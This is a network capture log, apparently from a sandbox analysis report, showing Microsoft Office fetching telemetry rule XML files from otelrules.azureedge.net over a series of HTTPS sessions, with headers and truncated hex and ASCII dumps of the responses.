2024-11-04 16:31:50 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.5	49850	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:50 UTC	192	OUT	GET /rules/rule700501v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:50 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:50 GMT Content-Type: text/xml Content-Length: 1405 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT ETag: "0x8DC582BE89A8F82" x-ms-request-id: b0d8e3fc-401e-0083-5d5c-2e075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163150Z-r159446fcd775vgfhC1DFW1fvw00000004s0000000002ph9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:50 UTC	1405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.5	49851	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:50 UTC	192	OUT	GET /rules/rule700500v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:50 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:50 GMT Content-Type: text/xml Content-Length: 1368 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE51CE7B3" x-ms-request-id: e6cb611f-001e-0017-6455-2e0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163150Z-176bd8f9bc56w2rshC1DFWd88n00000005t0000000003k8x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:50 UTC	1368	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.5	49852	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:50 UTC	192	OUT	GET /rules/rule702551v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:50 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:50 GMT Content-Type: text/xml Content-Length: 1415 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT ETag: "0x8DC582BDCE9703A" x-ms-request-id: 29f772fb-201e-0000-69d2-2ca537000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163150Z-16547b76f7f7scqbhC1DFW0m5w00000003mg00000000uk8u x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:50 UTC	1415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.5	49853	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:50 UTC	192	OUT	GET /rules/rule702550v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:50 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:50 GMT Content-Type: text/xml Content-Length: 1378 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE584C214" x-ms-request-id: 1cb8ce88-301e-0033-7f09-2cfa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163150Z-16547b76f7fx6rhxhC1DFW76kg00000003wg00000000cdak x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:50 UTC	1378	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.5	49854	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:51 UTC	192	OUT	GET /rules/rule701351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:51 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:51 GMT Content-Type: text/xml Content-Length: 1407 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE687B46A" x-ms-request-id: fda52046-a01e-001e-025c-2e49ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163151Z-15869dbbcc6pfq2ghC1DFW0bk000000003r000000000dqny x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:51 UTC	1407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.5	49855	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:51 UTC	192	OUT	GET /rules/rule701350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:51 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:51 GMT Content-Type: text/xml Content-Length: 1370 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE62E0AB" x-ms-request-id: 43525779-601e-003e-2ed2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163151Z-16547b76f7frbg6bhC1DFWr54000000003qg00000000uc2c x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:51 UTC	1370	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.5	49856	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:51 UTC	192	OUT	GET /rules/rule702151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:51 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:51 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE156D2EE" x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163151Z-16547b76f7fj5p7mhC1DFWf8w400000003wg00000000tkb9 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:51 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.5	49857	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:51 UTC	192	OUT	GET /rules/rule702150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:51 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:51 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT ETag: "0x8DC582BEDC8193E" x-ms-request-id: a009bb26-901e-005b-7e58-2e2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163151Z-176bd8f9bc56k8bfhC1DFW8xdg00000000q0000000007fw3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:51 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.5	49858	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:51 UTC	192	OUT	GET /rules/rule703001v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:51 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:51 GMT Content-Type: text/xml Content-Length: 1406 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB16F27E" x-ms-request-id: 3018e59d-101e-008d-7cd2-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163151Z-16547b76f7fm7xw6hC1DFW5px400000003tg00000000f2d1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:51 UTC	1406	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.5	49859	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:52 UTC	192	OUT	GET /rules/rule703000v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:52 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:52 GMT Content-Type: text/xml Content-Length: 1369 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE32FE1A2" x-ms-request-id: 44d511d9-701e-000d-2909-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163152Z-16547b76f7fx6rhxhC1DFW76kg00000003t000000000rutn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:52 UTC	1369	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.5	49860	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:52 UTC	192	OUT	GET /rules/rule700751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:52 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:52 GMT Content-Type: text/xml Content-Length: 1414 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE03B051D" x-ms-request-id: 8ba6fbd3-701e-0032-29d2-2ca540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163152Z-16547b76f7fxdzxghC1DFWmf7n000000041g000000008g92 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:52 UTC	1414	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

